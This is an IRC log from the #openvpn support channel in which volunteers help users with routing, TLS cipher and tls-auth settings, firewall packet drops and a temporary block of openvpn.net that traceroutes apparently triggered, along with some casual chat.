VPN in/out of 09:58 < rob0> hmmm. Maybe traceroute triggers the DoS filter? 09:58 < alaa> rob0: lol so at least it is not egypt specific 09:58 <@ecrist> could be 09:59 * ecrist poofs for a while 09:59 < rob0> that is a BAD idea, fwiw 09:59 < pekster> alaa: That friend is able to get further than you and appears to get all the way to the router before the web server 09:59 < alaa> pekster: yep 09:59 < pekster> Yea, clearly an issue with your ISP then 10:00 < pekster> It's *possible* it's some mistake/configuration issue with BGP or the like, but it could also be intentional. 
No real way to tell the difference 10:00 < alaa> pekster: for the traceroute yes, but my friend still can't access the website 10:01 < rob0> I can't either! From a USA ISP. 10:01 < pekster> Oh, interesting. Maybe it is intentional then and your ISPs have different ways of doing the block (or your friend isn't "supposed" to be able to trace out to US routers either) 10:01 < alaa> pekster: in fact no one in egypt seems to be able to, I got confirmation from over 30 tweeps spanning all the major ISPs 10:01 < pekster> rob0: You can't hit openvpn.net? Hmm, maybe an AS/BGP thing is up then 10:01 < rob0> pekster, times out, no response. 10:02 < pekster> rob0: Oh, nvm, can't be since you can hit 67.228.118.134 on a trace, right? 10:02 < rob0> I can trace to there, yes. 10:02 < pekster> Here's a ping-based trace for me: http://dpaste.org/oN7pu/ 10:02 < pekster> Right. Next hop after that is openvpn.net's webserver I believe 10:03 < rob0> Also times out from my well-connected colo in Birmingham. 10:03 < rob0> so we are blocked, it seems 10:05 < pekster> Interesting, same behaviour on my end now. After 3 or 4 traces over maybe 15 minutes. Seems a really low threshold for a DOS filter :\ 10:06 < pekster> Works fine from my SOCKS proxy out of an AWS cloud host 10:06 < pekster> :( 10:06 < pekster> Wonder how long I'm banned for :P 10:06 < rob0> mattock, ^^ why are we unable to reach http://openvpn.net/ ? 10:06 <@vpnHelper> Title: OpenVPN - Open Source VPN (at openvpn.net) 10:06 < rob0> mattock, this is ridiculous. 10:07 < pekster> traceroute/ping (I've pasted the results from 2 of my 4 runs) aren't that unusual for network-types to be doing. The threshold appears far too low for sane usage, IMO. 10:07 -!- KaiForce [~chatzilla@adsl-70-228-64-42.dsl.akrnoh.ameritech.net] has joined #openvpn 10:08 < rob0> http://downforeveryoneorjustme.com/openvpn.net "It's just you." Just me and my colo and pekster and all of Egypt ... 
10:08 <@vpnHelper> Title: Down For Everyone Or Just Me -> Check if your website is down or up? (at downforeveryoneorjustme.com) 10:09 < pekster> I suspect the Egypt case is different due to no traces from *.networklayer.com, but you & I shouldn't be having issues. FWIW I can still hit the routing infra upstream from openvpn.net 10:09 < rob0> I'm pissed. 10:10 < pekster> You've seen the same silly rulesets people post in #netfilter as I have that make liberal use of -m recent for all sorts of silly things... 10:12 < alaa> so I should relax whatever is going on is not caused by the Egyptian government 10:12 < alaa> ? 10:13 < pekster> alaa: Well, that's yet to be determined. rob0 and I both got ourselves "blocked" by doing a few traces to try and help you, so it "might" not be your end 10:13 < pekster> alaa: That said, something is still weird with your ISP since you should get to networklayer.com routers via traceroute or ping. Here are the UDP/traceroute and ICMP/ping traces I pasted earlier: http://dpaste.org/42OZJ/ http://dpaste.org/oN7pu/ (maybe your ISP blocks that kind of traffic?) 10:14 < alaa> pekster: I get the same traceroute no matter which address i test, so I guess my isp just blocks traceroutes!!! 10:15 < pekster> I'd suggest not trying to visit openvpn.net for a while and see if it's some badly written firewall rule that blocks you temporarily for attempting to trace the host (that's what I'm doing hoping the website block gets fixed for me) 10:15 -!- raidz_away is now known as raidz 10:19 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:19 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 10:31 < rob0> pekster, sure, I see silliness in #Netfilter, but I expect better from OpenVPN Technologies. 10:33 < pekster> Yup. If I can reproduce it after getting myself un-blocked (I hope that's automatic; my AWS/cloud host is a work-around, not the solution) I'll file a report. 
4 traces of modest (32-64 byte) size should not cause this 10:34 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:37 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 10:37 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 10:40 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 10:45 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:49 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 252 seconds] 10:51 < pekster> rob0 fwiw, the site is accessible for me now. If it wasn't a manual fix with the traffic here, then the temp-ban expired 10:58 < rob0> likewise. But still, that ban was stupid. 11:07 < mikey_w> I am trying to test a new openvpn install with a machine on the same lan. It connects and then I lose all internet connectivity on the test machine? 11:08 < mikey_w> The server pushes 192.168.1.0 to the client. 11:09 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 11:09 < pekster> Right, routing that via the VPN address instead of the link-local route; that'll cause you issues 11:10 < pekster> You can see the 'local' flag to redirect-gateway, but you don't want to push a route you access locally (I think some OSes will prefer the local route anyway, but it can depend on interface & metric too depending on the OS and configuration) 11:10 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [] 11:11 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 11:11 < pekster> mikey_w: Optionally, you can simulate an "off-network" connection by using a router off your LAN to give the client a different LAN IP range. It's still not the same as connecting in from outside, but the network is better simulated that way 11:12 < mikey_w> What's the proper redirect-gateway statement 11:12 < mikey_w> ? 
11:12 -!- p3rror [~mezgani@41.249.134.77] has joined #openvpn 11:13 < pekster> Depends on your needs. def1 is common, and you may need the local flag as I described earlier. Is there something you don't get from the manpage description of those optional flags? 11:14 < mikey_w> A lot. I've used def1 but no joy. 11:14 < pekster> What's your goal here? 11:15 < mikey_w> Just to test it on the local lan before going to a hotspot for testing. 11:15 < pekster> No, what are you trying to do? Testing is a means to test that something is working; what is that "something" ? 11:16 < pekster> !goal 11:16 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 11:16 < mikey_w> all of the above. 11:17 < pekster> ... some of those are mutually exclusive. You "just" want a secure connection, but "also" want to route your Internet over the connection? 11:17 < pekster> It's like saying all you want is an ice cream cone, but you also want dinner with that. 11:17 < pekster> Which is it? 11:18 < mikey_w> I have to think about it. 11:21 < matsh> !paste 11:21 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 11:21 < mikey_w> I keep getting bad source address from client in the log. 11:22 < pekster> Pastebin your server and client configuration, and the relevant logs 11:24 < mikey_w> sorry I have an interruption I need to address. later. 11:35 < matsh> pekster: Trying to hook up a dd-wrt router with my server, http://pastebin.com/rJAjk0W2 11:37 -!- dxtr [~dxtr@unaffiliated/dxtr] has left #openvpn [] 11:37 -!- brute11k [~brute11k@89.249.230.159] has quit [Read error: Connection reset by peer] 11:41 < pekster> matsh: Your comp-lzo options are mis-matched at the very least. 
They must match exactly on both sides of the connection 11:41 < pekster> matsh: Further, what are the two 192.168 networks? The server should not have a 'route' statement for its own LAN. What is 192.168.0.0/24 and 192.168.10.0/24? 11:41 -!- brute11k [~brute11k@89.249.230.159] has joined #openvpn 11:42 < matsh> pekster: But should that affect the tls negotiations? 11:42 -!- jtrimmer [~jtrimmer@75-151-66-133-WestFlorida.hfc.comcastbusiness.net] has joined #openvpn 11:42 < matsh> pekster: They are local lans on two different _clients_ 11:42 < matsh> 192.168.10/24 is the lan behind the dd-wrt 11:44 -!- mezgani_ [~mezgani@41.250.233.240] has joined #openvpn 11:44 < pekster> Ah, okay, and you have ccd files for each then? 11:44 < matsh> That is correct. 11:44 < pekster> Yes, comp-lzo problems should only be for the data channel IIRC, but you still need to fix it :) 11:46 < matsh> The problem is that dd-wrt automagically sets it to 'open-lzo yes' even though you specify it to 'open-lzo'. Could probably be better off adjusting the rest of nodes to '* yes' though. 11:46 -!- p3rror [~mezgani@41.249.134.77] has quit [Ping timeout: 272 seconds] 11:46 < pekster> The default is 'adaptive' which is not the same as 'yes' 11:47 < pekster> yes = forced on, no = forced off, adaptive = sample compression performance and turn on/off when data is compressible 11:47 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 255 seconds] 11:48 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 11:48 < matsh> Are there any reasons why I should not set it to 'yes'? 11:50 < pekster> I wouldn't use lzo when you're talking low-CPU like embedded hardware 11:50 < matsh> It's weird that the dd-wrt keeps enabling it then. 11:51 < matsh> pekster: However, got any idea why the tls doesn't play good? 11:52 < pekster> Do both sides support the TLS cipher-suite the client is hard-coded to require? 
ie: server shows that in its output for 'openvpn --show-tls' ? 11:53 < pekster> I believe when omitted it accepts anything, although you might want to retry matching that value on both peers 11:53 < jtrimmer> Hello everyone. I have a Windows OpenVPN Server inside our company subnet. I have clients connecting through our company firewall to a machine running openVPN setup in a TUN configuration. Now the server and the client can see each others subnets and talk back and forth. Everything seems to be working 100% on that aspect. But what I would like to do is also route traffic from all of the 11:53 < jtrimmer> other machines in the office to my clients local subnet as well. I setup a route on the company firewall to redirect traffic to the openVPN server IP but that is where everything fails. Can this even be done or am I living in a pipe dream? 11:54 < pekster> jtrimmer: You have a LAN behind the VPN client? 11:55 < matsh> pekster: The server supports it of course, I'm gonna have it checked on the router. If not, just set cipher global to anything they all support? 11:55 < jtrimmer> the vpn client is a Tomato Router 11:55 < pekster> jtrimmer: This may be useful for getting client LAN functioning: 11:55 < pekster> !clientlan 11:55 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 11:55 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 11:57 < pekster> matsh: I'm suggesting you match the 'tls-cipher' values between hosts. 
I believe it is "supposed" to work, but it's very non-standard to define cipher, auth, and tls-cipher directives on one side but not the other, even if you're specifying what should be the defaults 11:58 < pekster> Try "tls-cipher DHE-RSA-AES256-SHA" on the server and bounce the instance to see if anything changes 11:58 < matsh> Yeah I know, so I'm thinking there is a reason why dd-wrt keeps setting some values on its own. 11:58 < jtrimmer> !route_outside_openvpn 11:58 <@vpnHelper> "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png 11:58 < pekster> It could just be explicitly declaring them; I tend to do that in my configs too, but both sides of my connection match values 11:58 -!- mezgani_ [~mezgani@41.250.233.240] has left #openvpn ["Leaving"] 11:59 < matsh> Well, I know the server uses that cipher, because when the client only had AES256-SHA there was an explaining error, hence the change to DHE-RSA-AES256-SHA. 11:59 -!- p3rror [~mezgani@41.250.233.240] has joined #openvpn 11:59 < matsh> But I might be better off setting them manually to be sure. 12:00 < pekster> matsh: Posting full logs at 'verb 4' is a better way to troubleshoot this as it includes the full output of all the settings when the instance starts 12:01 -!- MeanderingCode [~Meanderin@71-213-170-8.albq.qwest.net] has joined #openvpn 12:01 < matsh> Ah, thanks. 
I didn't know 12:03 -!- Erawan_RN [~Erawan@unaffiliated/erawanarifnugroh] has quit [Ping timeout: 245 seconds] 12:03 < pekster> fwiw, my 2.3.0 installation works fine with that tls-cipher value on one side but not defined on the other 12:04 -!- Erawan_R` [~Erawan@www.erawan.me] has joined #openvpn 12:04 < pekster> That's the expected behaviour, although I'd encourage you to match the value if you choose to limit ciphers like that. There's a small advantage to doing it only on the server-side (in that you can change it centrally) but doing it only on the client side seems odd to me 12:06 -!- krad [~m@unaffiliated/krad] has joined #openvpn 12:06 < matsh> Yeah, I've never done it, but dd-wrt seems to have a will of its own 12:07 < pekster> This is why I trashed the OpenWRT initscript for OpenVPN and just wrote my own to use standard config files 12:08 < pekster> I hate systems that hide operation of services I want to manually run behind layers of buttons and distro-level knobs 12:09 < matsh> Agreed. 12:11 < pekster> Unless you're using --tls-auth on one side but not the other (via some implicit CLI argument your init does) I don't think you should be getting decryption issues with the posted config 12:11 < matsh> I believe the dd-wrt as specified ^auth 12:13 < pekster> verb 4 tells you everything you need to know. Compare output of values between peers for problems with critical things like tls-auth, auth, cipher, keysize, etc 12:13 < matsh> There is no 'tls-cipher' on the server log, should it be set manually then? 12:14 < matsh> And, is there a 'tls-auth' -and- 'auth'? 12:14 < jtrimmer> I think the flow charts are missing a section for my problem. I want to go from an ip on the same subnet as the server to a clients ip address. The server itself can talk to the clients and the clients can talk to all of the ips on the servers subnet just fine. Just not sure what to do when the server is a standalone machine and not the router for the entire subnet. 
12:15 < krad> i see a lot of talking in here, this is not a good metric for the channel. 12:16 < matsh> Maybe we should cycle in between the talking once in a while. 12:17 < pekster> jtrimmer: To the VPN client itself, or a PC on a LAN behind a VPN client? 12:19 < pekster> matsh: I'm talking about the output in your logs from 'verb 4' - that prints *every* config value, even if it's not defined in your config file or on the CLI 12:19 < matsh> pekster: Yeah I know, and it doesn't mention tls-cipher 12:21 < pekster> Ugh, trying to find the right value for you, and apparently 2.3.0 no longer does the expected output on windows at 'verb 4' :( 12:21 * pekster files that away to look into the source for later 12:21 < matsh> It says something about 'Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA, 1024 bit RSA' to the client that has successfully connected. 12:22 < pekster> Oh, that's good. This is before it complains about decryption? 12:24 < matsh> That is to a client that has successfully connected 12:25 < pekster> Gotta be something stupid your 2nd client is doing then. Try 'ps' or such on the other client to see if it's adding CLI params that break it 12:26 < pekster> Or a comp-lzo mis-match if that really does impact portions of the TLS channel (I'm not 100% sure that it's data-channel only without digging in the code to back that statement up) 12:27 < matsh> Yeah, it's not mine. The guy with the dd-wrt left for a bit, so I guess we'll have to try with the same tls and auth options specified later. 12:29 < pekster> That shouldn't make a difference (if you just set that on the server too) at least not based on my test with 2.3.0 12:29 < pekster> My guess is the client is doing something weird not shown in the config you posted 12:29 < matsh> Might be, I'll try and fetch a complete verb 4 output from him. 
12:29 < pekster> jtrimmer: If you have LANs behind both your VPN client and server, you need to set both the !clientlan and !serverlan stuff up 12:33 < jtrimmer> !serverlan 12:33 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 12:36 < jtrimmer> !route 12:36 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 12:41 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 12:41 -!- mode/#openvpn [+o krzee] by ChanServ 12:41 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Remote host closed the connection] 12:42 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 12:42 -!- mode/#openvpn [+o krzee] by ChanServ 12:51 -!- AndrewX192 [~andrew@unaffiliated/andrewx192] has joined #openvpn 12:51 -!- alaa [~alaa@41.36.146.1] has quit [Quit: Leaving] 12:51 < AndrewX192> What's the difference between tls-server and tls-auth direction? 12:52 <@krzee> !man 12:52 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 
12:53 < pekster> tls-server sets the peer to act as a server during the TLS-handshake (which has explicit requirements for being a "server" versus a "client.") tls-auth direction is an arbitrary value that must either be omitted, or be opposite between peers 12:53 < pekster> And yes, that should be explained nicely in the manpages too :) 12:54 -!- jtrimmer [~jtrimmer@75-151-66-133-WestFlorida.hfc.comcastbusiness.net] has quit [] 12:59 < AndrewX192> I was looking in the man page, I just didn't see anything in reference to tls-auth direction in the man page, and it turned out I needed to scroll up to before --tls-server directive in the man page to see "TLS Mode Options" 13:01 < pekster> Oh, yea. There is no "direction" to --tls-auth (that's an allowable list of asymmetric cipher-suites to allow from the supported choices) 13:02 < pekster> Same as in https, the server sends an acceptable list of choices, and the client picks one 13:02 < pekster> To prevent downgrade attacks, hardened setups should limit this to a sane and secure subset 13:05 < pekster> I actually had that backwards: the client (initiating system) sends the suggested ciphersuite list 13:17 <@dazo> uhm 13:17 <@dazo> that sounds wrong 13:18 <@dazo> --tls-auth is adding additional HMAC data to the OpenVPN data (TLS packets) ... which is a way to authenticate the TLS packets 13:18 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 255 seconds] 13:19 <@dazo> if the TLS packet has been modified (think MITM attacks), the HMAC will not correspond - and the openvpn server or client can just drop the packet before even trying to decrypt it 13:20 <@dazo> the 'direction' flag is to indicate to openvpn which key-pair to use ... as the shared 'secret' (generated by openvpn --genkey) contains data for several keys ... 
so each side uses one key for signing packets, and the other key to verify packets from the remote side 13:21 <@dazo> which makes it even harder to intercept an on-going openvpn connection 13:22 < pekster> Erm, --tls-cipher 13:22 < pekster> Yea, it was an issue confusing the operation of those 2 params 13:22 <@dazo> --tls-cipher is something completely different :) 13:23 < pekster> Right. The original question was about the difference between them, and I just transposed one value when describing another. Not doing a great job for clarifying the distinction, 'eh? :\ 13:23 <@dazo> --tls-server and --tls-client is to enable the PKI mode of openvpn ... which implicitly means, the multi-peer-to-peer mode (--server / --mode server) 13:23 < EugeneKay> --tls-bacon 13:23 < EugeneKay> Best option ever. 13:23 <@dazo> EugeneKay: that only makes it smelly! 13:24 <@dazo> makes the CPU work too hard 13:25 -!- MeanderingCode [~Meanderin@71-213-170-8.albq.qwest.net] has quit [Read error: Connection reset by peer] 13:26 < EugeneKay> Yeah, but if you install a grease-powered generator you can run the server for pennies 13:26 < pekster> cd openvpn; ./configure --with-grease-power 13:27 -!- cmelbye [~charlie@yourwiki/staff/charlie] has quit [Read error: Connection reset by peer] 13:28 < pekster> I seem to recall seeing some source comment in 2.3.0 about verb 4 silently not printing the param listing, but I'm not finding that now. Am I just missing that? If it's intentional, the --help output on Windows sure doesn't suggest that behaviour 13:30 <@dazo> pekster: we have not changed anything in regards to --verb and config dumping .... it comes on --verb 4 but not 3 13:32 < pekster> I'm not getting it on a 2.3.0 install of the 64-bit I004 build (I believe it acted this way in earlier builds too.) Run from the command-line, so no funny GUI-wrapper involved 13:34 < pekster> even nothing at verb 6... 
13:34 < pekster> http://dpaste.org/p5tbO/ 13:39 <@dazo> pekster: oh, if it's built with --enable-small ... then it might not add that 13:40 <@dazo> openvpn --version ... what does it say? 13:40 < pekster> Yea, or the ENABLE_DEBUG def in options.c 13:40 < pekster> Sure enough, enable_debug=no 13:41 <@dazo> yeah ... I think --enable-small implies disabling ENABLE_DEBUG 13:42 < pekster> Yup. line 884 on options.c: http://fpaste.org/7Cmv/ 13:42 < pekster> Should I open a ticket? That breaks the printed help output shown for --verb when you do 'openvpn --help' under Windows 13:42 < pekster> It's a build issue, not a code issue 13:43 < pekster> (too bad I didn't look into that before the I004 build went live. Oh well) 13:43 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 13:45 < pekster> enable_small=no, fwiw. Just missing the enable_debug 13:45 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 13:45 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 13:45 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 13:45 -!- mode/#openvpn [+o krzee] by ChanServ 13:46 < pekster> full output: http://dpaste.org/0O9WO/ 13:46 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 252 seconds] 13:48 < pekster> I guess the other solution is make that part of the code not rely on ENABLE_DEBUG and include it even without --with-debug. The ./configure output suggests it's specifically for verb 7+ stuff 13:49 < pekster> Either rip out the #ifdef, or give it a separate build-time option, like ENABLE_SHOW_PARM or such 13:51 < pekster> I'll hit -devel@ with the details and options. 
Either official builds should contain --enable-debug or options.c should be changed 13:55 < krad> don't get too much excited 13:56 -!- Varazir_ [~mircwars@c-94-255-130-138.cust.bredband2.com] has joined #openvpn 13:58 -!- Varazir [~mircwars@c-94-255-128-179.cust.bredband2.com] has quit [Ping timeout: 252 seconds] 14:00 -!- dazo is now known as dazo_afk 14:06 -!- Varazir_ is now known as Varazir 14:14 -!- axelm7 [~axelm7@200-127-146-90.net.prima.net.ar] has joined #openvpn 14:15 < axelm7> hi guys, which is the correct VPN client for a Windows 7 machine where my user is not administrator and he does not have permissions to change the routes? 14:15 < axelm7> can I use the AS client that runs as a service? 14:16 < pekster> Changing routes requires administrator access by the process performing the operation, or the correct set of delegated OS privileges to do so 14:16 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 14:17 < pekster> I've no clue how AS does things (#openvpn-as is the place to ask about the AS product as here is for the OpenVPN project specifically) 14:18 -!- magic_1 [~magic@unaffiliated/magic1/x-836121] has joined #openvpn 14:19 < pekster> This may be of use too: http://www.openvpn.se/files/howto/openvpn-howto_run_openvpn_as_nonadmin 14:19 <@vpnHelper> Title: HowTo Run OpenVPN as a non-admin user in Windows (at www.openvpn.se) 14:19 < magic_1> anyone know what would be cause the tls auth from timing out 14:19 < pekster> Creative use of the service method with the management interface could probably allow encrypted passwords and service-level control by a fully non-admin user 14:21 < magic_1> well key negotiations to fail 14:22 < magic_1> ive opened the port on the firewall but im just not getting through 14:22 < pekster> magic_1, a variety of things cause TLS handshake timeouts, ranging from network problems to the remote host dropping the traffic if it fails to pass one of the security checks. 
What logs on the remote host do you get during a connection attempt? 14:23 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 14:24 < magic_1> was thinking that as well pekster, however inside the firewall it connects just fine, thats whats confusing me 14:25 < pekster> Sounds like a network issue then. tcpdump and careful evaluation of your firewall rules should help determine where traffic is (or is not) going 14:25 < magic_1> i am at my wits end 14:26 < magic_1> will be doing that again 14:27 -!- dbhaber [me@208.99.80.128] has joined #openvpn 14:27 < dbhaber> yolo 14:34 -!- julius__ [~julius@p3EE2AB4F.dip.t-dialin.net] has joined #openvpn 14:34 < julius__> hi 14:34 < dbhaber> hi 14:34 * dbhaber pokes ecrist 14:35 < julius__> ive got a openvpn server running which accepts multiple clients. ive read "Including multiple machines on the client side when using a routed VPN" in the howto. does this mean that machines behind the client will communicate directly without sending all communications over the server? 14:35 <@ecrist> dbhaber: wtf is up man? 14:36 < dbhaber> ecrist: is that a good wtf 14:36 <@ecrist> got your PM, didn't bother replying on the forum, btw 14:36 < dbhaber> or a bad one 14:36 <@ecrist> yes 14:36 <@ecrist> good 14:36 < pekster> julius__: No, all communication is routed via the server in a setup like that 14:36 < dbhaber> ecrist: same old same old really 14:36 < dbhaber> this tapatalk business actually makes it very easy for me to be active once again 14:36 < julius__> for example, my server is on a rather low bandwidth but machines behind the client could use a 100mbit network if they need to exchange data 14:37 < julius__> pekster, is there no way to have machines in one lan recognize that their communication peer is closer in the current lan than over the openvpn server? 
14:37 < pekster> julius__: Run a point-to-point VPN between the clients and route across that then 14:37 < julius__> i will look that up 14:37 < pekster> If you add a route to reach $other_client_lan via the VPN server, routing sends it via the VPN server 14:38 < dbhaber> ecrist: i know this is years old already but how is your wife 14:38 < dbhaber> i still remember hearing she got hurt 14:39 < pekster> You'd need separate tunnels if you wanted two peers to directly exchange information with each other. That doesn't work if, for example, both clients are behind NAT you don't control and can only reach your server via outbound connections 14:40 <@ecrist> dbhaber: she's fine now. only long-lasting problem is her olfactory nerve was severed, so she can't smell anything any more 14:40 < dbhaber> that really sucks 14:41 < dbhaber> i wouldnt like life as much.. but then again, as an EMT, if there were things I could never smell again, totally cool with me 14:41 -!- medum_ [kevin@n2l.org] has quit [Remote host closed the connection] 14:41 < dbhaber> how are things in MN? 14:41 < pekster> Bloody cold... 14:41 < dbhaber> lol 14:48 <@ecrist> they are, really 14:48 <@ecrist> pekster: you live around here somewhere, don't you? 14:49 * ecrist knows someone in here does 14:49 < dbhaber> ecrist: still running a datacenter out of the basement? luls 14:49 <@ecrist> dbhaber: no 14:49 < krad> haber is ignoring me 14:49 < dbhaber> no more racks? 14:49 <@ecrist> nope 14:49 < dbhaber> how come 14:49 < dbhaber> krad: frankly, you're just creepy 14:49 < krad> what is creepy 14:49 < pekster> ecrist: Yup, south of the river from St Paul 14:50 <@ecrist> CG, myself 14:50 < krad> dbhaber, 1. 
Informal having or causing a sensation of repulsion, horror, or fear, as of creatures crawling on the skin 14:51 < krad> dbhaber, did you mean that 14:51 <@ecrist> dbhaber: I colo all my boxes, or have VMs now 14:51 < magic_1> lol 14:51 < krad> haber and i share the same family name, yet he's being mean to me 14:52 < krad> we are in different continents as well 14:52 < magic_1> oooo 14:52 < krad> and we just met! 14:53 * krad will disfamily dbhaber 14:53 < krad> hi db 14:56 < dbhaber> ecrist: ahh. where do you colo now 14:56 < dbhaber> I am down to one server at DedicatedNOW now that I colo, and i still have my brocolo in MD 14:59 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 248 seconds] 15:05 < dbhaber> ecrist: i will try to show my face around the forums a bit more now and deal with some of the idiots 15:05 -!- jtrimmer [~jtrimmer@75-151-66-133-WestFlorida.hfc.comcastbusiness.net] has joined #openvpn 15:05 < dbhaber> and silly questions 15:05 < krad> lol 15:07 -!- krad [~m@unaffiliated/krad] has quit [] 15:09 < jtrimmer> I feel like I'm playing whack-a-mole with openVPN. I get one thing working then another breaks. 15:09 <@ecrist> dbhaber: I use RootBSD 15:11 < dbhaber> never heard of, at least not much 15:11 < dbhaber> jtrimmer: lawl 15:11 < dbhaber> well hopefully you are getting a high score 15:11 -!- magic_1 [~magic@unaffiliated/magic1/x-836121] has quit [] 15:12 < jtrimmer> no the moles are laughing at me 15:13 -!- Erawan_R` [~Erawan@www.erawan.me] has quit [Read error: Connection reset by peer] 15:13 -!- Erawan_Ra [~Erawan@at.erawan.me] has joined #openvpn 15:13 < dbhaber> :( 15:14 -!- p3rror [~mezgani@41.250.233.240] has quit [Read error: Connection reset by peer] 15:14 -!- p3rror [~mezgani@41.249.144.158] has joined #openvpn 15:15 < jtrimmer> now the server and the machines on the server side can talk to the clients and their lans but the clients and their lans cannot ping the server machines. It is annoying. 
15:16 -!- Voss [~Voss@unaffiliated/dionysus] has left #openvpn [] 15:16 -!- axelm7 [~axelm7@200-127-146-90.net.prima.net.ar] has quit [Ping timeout: 276 seconds] 15:18 < pekster> jtrimmer: If you can ping one direction but not the other, you likely have a firewall problem. NAT is also a possibility if you're performing SNAT when you intend to be doing full routing instead 15:19 -!- julius__ [~julius@p3EE2AB4F.dip.t-dialin.net] has quit [Quit: Leaving] 15:19 < pekster> tcpdump and friends will help; just step through each hop the packet takes 15:19 < jtrimmer> it shouldn't be a firewall as I have all of the firewalls shut off. I'm pretty sure it is nat but I'm scratching my head not seeing the problem. 15:20 < dbhaber> hmm is the bot still here 15:20 < dbhaber> !logs 15:20 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 15:20 < pekster> logs aren't relevant if a ping works; it's not a connection issue, or even a routing issue if a system on one side of the VPN server can ping a system behind a VPN client 15:22 < pekster> jtrimmer: Don't make assumptions about firewalls. You have at least 4 systems involved, and more if the VPN client/server isn't the default gateway on their respective LANs. That's up to 6 systems right there, and more if the backend LANs are more complex 15:22 < jtrimmer> the client is the default gateway the server is not 15:23 < pekster> So you have no fewer than 5 systems involved in VPN transport path 15:23 < jtrimmer> I have wireshark running on the server right now. I see the request go out but never see a reply come back. 15:24 < pekster> Go out where, to the server-side LAN? 
15:24 < jtrimmer> I have a static route set up on the gateway on the server side to send all client traffic back to the server machine as the gateway.
15:24 < pekster> Is your target replying to the ping?
15:24 < pekster> dump traffic there
15:25 < pekster> It's either that or the LAN gw dropping/not-responding to the traffic
15:25 < jtrimmer> duh I should have thought of that
15:26 < pekster> When I said "don't make assumptions about firewalls" I meant that quite literally
15:29 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit []
15:32 < jtrimmer> The SonicWall is dropping the packets. Weird though because when I ping from a machine on the server side the SonicWall passes them on just fine.
15:33 < pekster> Not weird at all. My IPv6 border firewall does the same thing: it allows unsolicited traffic in only 1 direction
15:34 < pekster> Maybe not what you want/expected, but then you need to fix it
15:35 < jtrimmer> well yeah it is dropping all packets coming from the client side, I have to fix it.
15:37 < jtrimmer> it is calling them IP spoofs and dropping the packets
15:40 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Quit: Leaving]
15:43 -!- jtrimmer [~jtrimmer@75-151-66-133-WestFlorida.hfc.comcastbusiness.net] has quit [Read error: Connection reset by peer]
15:44 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
15:48 -!- jtrimmer [~jtrimmer@75-151-66-133-WestFlorida.hfc.comcastbusiness.net] has joined #openvpn
15:49 < jtrimmer> whoops, changed the wrong setting. Took down the internet for a minute
15:50 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn
